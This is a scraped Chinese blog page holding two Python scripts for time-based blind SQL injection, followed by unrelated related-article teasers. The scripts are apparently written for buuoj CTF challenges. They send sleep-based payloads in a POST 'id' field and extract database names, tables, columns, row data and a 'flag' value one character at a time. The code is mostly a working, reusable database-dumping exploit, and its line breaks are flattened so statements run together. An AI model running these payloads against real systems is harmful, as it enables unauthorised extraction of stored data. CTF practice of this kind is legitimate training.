def GetDBTables(url, dbname):global DBTables# 存放数据库表数量的变量DBTableCount = 0print("[-]开始获取{0}数据库表数量:".format(dbname))# 开始遍历获取数据库表的数量for DBTableCount in range(1, 99):time.sleep(0.05)timeStart = time.time()payload = "if((select count(table_name) from information_schema.tables where table_schema='" + dbname + "' )=" + str(DBTableCount) + ",sleep(5),0)"data = {'id': payload,}res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))breakprint("[-]开始获取{0}数据库的表".format(dbname))# 遍历表名时临时存放表名长度变量tableLen = 0# a表示当前正在获取表的索引for a in range(0, DBTableCount):print("[-]正在获取第{0}个表名".format(a + 1))# 先获取当前表名的长度for tableLen in range(1, 99):time.sleep(0.05)payload = "if((select length(table_name) from information_schema.tables where table_schema='" + dbname + "' limit " + str(a) + ",1)=" + str(tableLen) + ",sleep(5),0)"timeStart = time.time()data = {'id': payload,}res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:break# 开始获取表名# 临时存放当前表名的变量table = ""# b表示当前表名猜解的位置for b in range(1, tableLen + 1):# c表示33~127位ASCII中可显示字符for c in range(33, 128):time.sleep(0.05)timeStart = time.time()payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='" + dbname + "' limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"data = {'id': payload,}res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:table += chr(c)print(table)break# 把获取到的名加入到DBTablesDBTables.append(table)# 清空table,用来继续获取下一个表名table = ""# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):global DBColumns# 存放字段数量的变量DBColumnCount = 0print("[-]开始获取{0}数据表的字段数:".format(dbtable))for DBColumnCount in range(99):time.sleep(0.05)payload = "if((select count(column_name) from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "')=" + str(DBColumnCount) + ",sleep(5),0)"data = {'id': payload,}timeStart = time.time()res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))break# 开始获取字段的名称# 保存字段名的临时变量column = ""# a表示当前获取字段的索引for a in range(0, DBColumnCount):print("[-]正在获取第{0}个字段名".format(a + 1))# 先获取字段的长度for columnLen in range(99):time.sleep(0.05)payload = "if((select length(column_name) from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "' limit " + str(a) + ",1)=" + str(columnLen) + ",sleep(5),0)"data = {'id': payload,}timeStart = time.time()res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:break# b表示当前字段名猜解的位置for b in range(1, columnLen + 1):# c表示33~127位ASCII中可显示字符for c in range(33, 128):time.sleep(0.05)timeStart = time.time()payload = "if(ascii(substr((select column_name from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "' limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"data = {'id': payload,}res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:column += chr(c)print(column)break# 把获取到的名加入到DBColumnsDBColumns.append(column)# 清空column,用来继续获取下一个字段名column = ""# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):global DBData# 先获取字段数据数量DBDataCount = 0print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))for DBDataCount in range(99):time.sleep(0.05)payload = "if((select count(" + dbcolumn + ") from " + dbtable + ")=" + str(DBDataCount) + ",sleep(5),0)"data = {'id': payload,}timeStart = time.time()res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))breakfor a in range(0, DBDataCount):print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a + 1))# 先获取这个数据的长度dataLen = 0for dataLen in range(99):time.sleep(0.05)payload = "if((select length(" + dbcolumn + ") from " + dbtable + " limit " + str(a) + ",1)=" + str(dataLen) + ",sleep(5),0)"data = {'id': payload,}timeStart = time.time()res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]第{0}个数据长度为:{1}".format(a + 1, dataLen))break# 临时存放数据内容变量data1 = ""# 开始获取数据的具体内容# b表示当前数据内容猜解的位置for b in range(1, dataLen + 1):for c in range(33, 128):time.sleep(0.05)payload = "if(ascii(substr((select " + dbcolumn + " from " + dbtable + " limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"data = {'id': payload,}timeStart = time.time()res = conn.get(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:data1 += chr(c)print(data1)break# 放到以字段名为键,值为列表的字典中存放DBData.setdefault(dbcolumn, []).append(data1)print(DBData)# 把data清空来,继续获取下一个数据data1 = ""# 盲注主函数
def StartSqli(url):GetDBName(url)print("[+]当前数据库名:{0}".format(DBName))GetDBTables(url, DBName)print("[+]数据库{0}的表如下:".format(DBName))for item in range(len(DBTables)):print("(" + str(item + 1) + ")" + DBTables[item])tableIndex = int(input("[*]请输入要查看表的序号:")) - 1GetDBColumns(url, DBName, DBTables[tableIndex])while True:print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))for item in range(len(DBColumns)):time.sleep(0.05)print("(" + str(item + 1) + ")" + DBColumns[item])columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1if (columnIndex == -1):breakelse:GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])if __name__ == '__main__':try:usage = "./BlindTime_get.py -u url"parser = OptionParser(usage)# 目标URL参数-uparser.add_option('-u', '--url', dest='url',default='http://1e21f92c-e6dd-42ac-95f0-ed1281e49749.node4.buuoj.cn:81/', type='string',help='target URL')options, args = parser.parse_args()url = options.urlthreadSQL = threading.Thread(target=StartSqli, args=(url,))threadSQL.start()except KeyboardInterrupt:print("Interrupted by keyboard inputting!!!")

时间盲注-POST-1

#!/usr/bin/python3
# -*- coding: utf-8 -*-import requests
from optparse import OptionParser
import time
import threading# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = Falsedef woqv(url):a=""print("[-]开始获取数据库名长度")# 用for循环来遍历请求,得到数据库名长度for ll in range(1, 50):for kk in range(33,127):time.sleep(0.05)# 开始时间timeStart = time.time()payload = "if((ascii(substr((select(flag)from(flag))," + str(ll) + ",1))=" + str(kk) + "),sleep(5),0)"# "admin' and if(length(database())=8,sleep(5),0) #"data = {'id':payload,}res = conn.post(url,data=data)# 结束时间timeEnd = time.time()# 判断时间差if timeEnd - timeStart >= 5:a+=chr(kk)print(a)break# 盲注主函数
def StartSqli(url):woqv(url)if __name__ == '__main__':try:usage = "./BlindTime_get.py -u url"parser = OptionParser(usage)# 目标URL参数-uparser.add_option('-u', '--url', dest='url',default='http://4fbbc7a5-c5b9-4628-b997-a2c82c97252d.node4.buuoj.cn:81/', type='string',help='target URL')options, args = parser.parse_args()url = options.urlthreadSQL = threading.Thread(target=StartSqli,args=(url,))threadSQL.start()except KeyboardInterrupt:print("Interrupted by keyboard inputting!!!")

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/22632.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Linux后端服务器开发】Reactor模式实现网络计算器

【Linux后端服务器开发】Reactor模式实现网络计算器

目录 一、Reactor模式概述 二、日志模块:Log.hpp 三、TCP连接模块:Sock.hpp 四、非阻塞通信模块:Util.hpp 五、多路复用I/O模块:Epoller.hpp 六、协议定制模块:Protocol.hpp 七、服务器模块:Server.…
阅读更多...
MySQL安装详细教程!!!

MySQL安装详细教程!!!

安装之前,先卸载你之前安装过的数据库程序,否则会造成端口号占用的情况。 1.首先下载MySQL:MySQL :: Download MySQL Community Server(下载路径) 2.下载版本不一样,安装方法略有不同;(版本5的安装基本一致&#xff0c…
阅读更多...
gitlab搭建

gitlab搭建

回到目录 GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web 服务。 Gitlab 是被广泛使用的基于 git 的开源代码管理平台, 基于 Ruby on Rails 构建, 主要针对软件开发过程中产生的代码和文档进行管理,…
阅读更多...
六、目录树生成工具_zDirTree

六、目录树生成工具_zDirTree

1、zDirTree工具简介 zDirTree可以根据文件资源生成目录树,就是用文本的形式把文件层级结构表示出来,可以方便理解文件结构。 2、zDirTree工具下载 (1)我没有找到这工具的官方下载地址。 (2)我是微信公众号"干货食堂"中下载。 3、软件使用…
阅读更多...
健身计划:用思维导图记录你的健身目标、锻炼项目、时间安排等

健身计划:用思维导图记录你的健身目标、锻炼项目、时间安排等

现在,大家越来越在乎自己的身体健康,健身也成了大家工作之外非常重要的一件事。一个好的健身计划的制定可以让我们的健身计划事半功倍。 思维导图作为一种高效的可视化思维工具,在健身计划制定的过程中,可以让我们的各项任务与时间…
阅读更多...
【Android】APP电量优化学习笔记

【Android】APP电量优化学习笔记

电量优化原因 电量优化在 Android 开发中非常重要,原因如下: 用户体验: 电池续航时间是用户在使用移动设备时非常关注的因素之一。通过进行电量优化,可以延长设备的电池寿命,使用户能够更长时间地使用设备而不必频繁…
阅读更多...
VS2017中Qt工程报错:无法解析的外部符号 __imp_CommandLineToArgvW,该符号在函数 WinMain 中被引用

VS2017中Qt工程报错:无法解析的外部符号 __imp_CommandLineToArgvW,该符号在函数 WinMain 中被引用

工程报错:无法解析的外部符号 __imp_CommandLineToArgvW,该符号在函数 WinMain 中被引用 解决方法: 在输入的附加依赖项中增加 shell32.lib
阅读更多...
Vue_01学习:详细语法以及代码示例 + 小练习 + 综合案例 (第一期)

Vue_01学习:详细语法以及代码示例 + 小练习 + 综合案例 (第一期)

2023年8月3日14:56:49 Vue_01_note Vue是什么? 概念:Vue是一个用于 构建用户界面 的 渐进式 框架 构建用户界面:基于 数据 动态 渲染 页面渐进式:循序渐进的学习框架:一套完整的项目解决方案,提升开发效率…
阅读更多...
动态代理类之万能模板

动态代理类之万能模板

ProxyInvocationHandler package com.heerlin.demo03;import com.heerlin.demo02.Rent;import java.lang.reflect.InvocationHandler; import java.lang.reflect.Method; import java.lang.reflect.Proxy;//用这个类,自动生成代理类 public class ProxyInvocationH…
阅读更多...
分页Demo

分页Demo

目录 一、分页对象封装 分页数据对象 分页查询实体类 实体类用到的utils ServiceException StringUtils SqlUtil BaseMapperPlus,> BeanCopyUtils 二、示例 controller service dao 一、分页对象封装 分页数据对象 import cn.hutool.http.HttpStatus; import com.…
阅读更多...
VBA技术资料1-146

VBA技术资料1-146

VBA技术资料本周更新较多:单值查找并提示结果;多值查找并提示结果;复制整个数据范围到PowerPoint;更改PowerPoint文本框字体大小;调整PowerPoint图像为整幻灯片;在PowerPoint中添加末尾幻灯片;在…
阅读更多...
安防监控视频融合EasyCVR平台接入RTSP流后设备显示离线是什么原因?

安防监控视频融合EasyCVR平台接入RTSP流后设备显示离线是什么原因?

安防监控视频EasyCVR视频汇聚融合平台基于云边端智能协同架构,具有强大的数据接入、处理及分发能力,平台支持海量视频汇聚管理、全网分发、按需调阅、鉴权播放、智能分析等视频能力与服务。平台开放度高、兼容性强、可支持灵活拓展与第三方集成&#xff…
阅读更多...
学生信息管理系统springboot学校学籍专业数据java jsp源代码mysql

学生信息管理系统springboot学校学籍专业数据java jsp源代码mysql

本项目为前几天收费帮学妹做的一个项目,Java EE JSP项目,在工作环境中基本使用不到,但是很多学校把这个当作编程入门的项目来做,故分享出本项目供初学者参考。 一、项目描述 学生信息管理系统springboot 系统3权限:超…
阅读更多...
【无标题】pandas中的DataFrame如何筛选截取列和行并且将他们合成新的DataFrame

【无标题】pandas中的DataFrame如何筛选截取列和行并且将他们合成新的DataFrame

行截取 可以使用 iloc 方法提取 DataFrame 的若干行组成一个新的 DataFrame。iloc 方法接受一个整数列表,列表中的整数表示要提取的行的索引。例如,提取 DataFrame 的第 1 行、第 2 行和第 6 行可以使用以下代码 df_new df_old.iloc[[0, 1, 5]]其中&a…
阅读更多...
【雕爷学编程】MicroPython动手做(33)——物联网之天气预报3

【雕爷学编程】MicroPython动手做(33)——物联网之天气预报3

天气(自然现象) 是指某一个地区距离地表较近的大气层在短时间内的具体状态。而天气现象则是指发生在大气中的各种自然现象,即某瞬时内大气中各种气象要素(如气温、气压、湿度、风、云、雾、雨、闪、雪、霜、雷、雹、霾等&#xff…
阅读更多...
【基础类】—DOM事件系统性学习

【基础类】—DOM事件系统性学习

一、基本概念:DOM事件的级别 // DOM0 element.onclickfunction(){} // DOM2, 新增了冒泡和捕获 element.addEventListener(click,function(){}, false) // DOM3, 新增更多事件类型 鼠标、键盘等 element.addEventListener(keyup,function(){}, false)二、DOM事件模…
阅读更多...
JVM 学习

JVM 学习

这里写目录标题 说一说JVM的内存区域JVM 内存模型volatile的使用及其原理Java中类加载过程是什么样的?方法区内存溢出怎么处理?谈谈动态年龄判断哪些是 GC Roots?强引用、软引用、弱引用、虚引用是什么,有什么区别?工作中常用的 JVM 配置参数有哪些?谈谈对 OOM 的认识谈谈…
阅读更多...
解决在mybatis中使用class属性绑定映射文件出现的异常问题~

解决在mybatis中使用class属性绑定映射文件出现的异常问题~

如下所示&#xff0c;当我在XML文件中通过class属性配置其mapper文件时&#xff0c;出现下述错误 <mappers><mapper class"mappers.userMapper"/> </mappers>错误描述&#xff1a; 解决方法如下所示&#xff1a;在pom.xml文件中添加下述代码 <…
阅读更多...
网络安全进阶学习第十一课——MySQL手工注入(2)

网络安全进阶学习第十一课——MySQL手工注入(2)

文章目录 一、UA注入1、原理2、靶场演示&#xff1a;1&#xff09;一旦页面出现如下现状&#xff0c;就可以使用UA注入2&#xff09;BP抓包3&#xff09;修改User-Agent 二、referer注入1、原理2、靶场演示&#xff1a;1&#xff09;使用BP抓包2&#xff09;修改Referer 三、DN…
阅读更多...
计算机视觉的延伸整理

计算机视觉的延伸整理

计算机视觉是一门涉及数字图像处理、模式识别和机器学习等技术的交叉学科&#xff0c;旨在将计算机技术应用于对视觉信息的理解和处理。其主要研究内容包括图像和视频处理、目标检测和跟踪、三维重建、人脸识别、自动驾驶等。计算机视觉已经被广泛应用于医学影像分析、安防监控…
阅读更多...
最新文章

Copyright @ 2022~2023